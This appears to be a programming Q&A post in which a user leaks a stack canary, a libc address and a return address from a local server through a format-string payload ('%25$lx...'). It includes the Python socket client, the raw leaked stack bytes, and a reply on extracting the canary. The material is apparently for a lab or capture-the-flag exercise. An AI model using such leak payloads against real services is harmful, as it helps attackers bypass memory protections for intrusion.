# i want a regex function for parsing shellcode to get hex address in python

Tags: python, regex, buffer-overflow, leakcanary, aslr

```
b'%25$lx\n%37$lx\n%27$lx\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x84\x81\xac\x98U\x00\x00\x00\xab\xa5\x7f\xd6v\x15\x1d0`\x9b\xf9\xfe\x7f\x00\x00S\x84\x81\xac\x98U\x00\x00(a\x9b\xf9\xfe\x7f\x00\x00\xb5\x84\x81\xac\x01\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x02\x00\xe8\x84\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00 a\x9b\xf9\xfe\x7f\x00\x00\x00\xab\xa5\x7f\xd6v\x15\x1d\x00\x00\x00\x00\x00\x00\x00\x00\xed\xf7(\xa2n\x7f\x00\x00(a\x9b\xf9\xfe\x7f\x00\x00\x00P\x9e\xf9\x01\x00\x00\x00\xf8\x82\x81\xac\x98U\x00\x00Yd\x9b\xf9\xfe\x7f\x00\x00p\x84\x81\xac\x98U\x00\x00\xe0\xe1\xc5\xd6J\xda\x0f\xc6\x10\x81\x81\xac\x98U\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xe1E\x16|)\xf29\xe0\xe1\x899\x1b\x9e\xd28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00(a\x9b\xf9\xfe\x7f\x00\x008a\x9b\xf9\xfe\x7f\x00\x00 \x82G\xa2n\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
```

so i want to retrieve these values ( stack canary, system call, return address of a function)

```
1d1576d67fa5ab00
7f6ea228f7ed
5598ac818453
```

from the client socket

this is my python code on the client side

```
import socket
import re
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 8080))
s.sendall('%25$lx\n%37$lx\n%27$lx'.encode())
while 1:
    data = s.recv(400)
    print(data)
    if not data:
        break
    results = [
    dict(re.findall(r'\s--([0-9a-fA-F]+)(?:--)?\s', data))
    for data in filter(
        bool,  # non-empty
        data.decode("utf8", "replace").split("&&"),
    )
]
print (results)
s.close()
```

so i want to retrieve these values ( stack canary, system call, return address of a function).

Comment: I don't know how you recognize addresses if you have only bytes values.

Comment: im printing the stack from the server through format string which is why the starting is %25$lx. now i got the address which is printed through printf but i need to send the address back to client through socket. i mucked around and i got it to send through shell and i recognise the canary in that but how to parse it is the question.

Comment: The canary will be always at the same distance from the start of the string, so you should be able to isolate it like this: `canary = data[n:n+8]` by executing one time and counting how big is `n`.
After that be aware of the indianness of the canary!

Moreover, I'd like to suggest you use pwntools instead python sockets to connect to a remote challenge. That will be a lot more easy, in my opinion

Comment: unfortunately, the remote server( its a local server and the server doesnt send a reply so i had to jerryrig a send on server side if that makes sense.) i have the theory down but since im not too proficient in python, its a hassle, thanks anyway.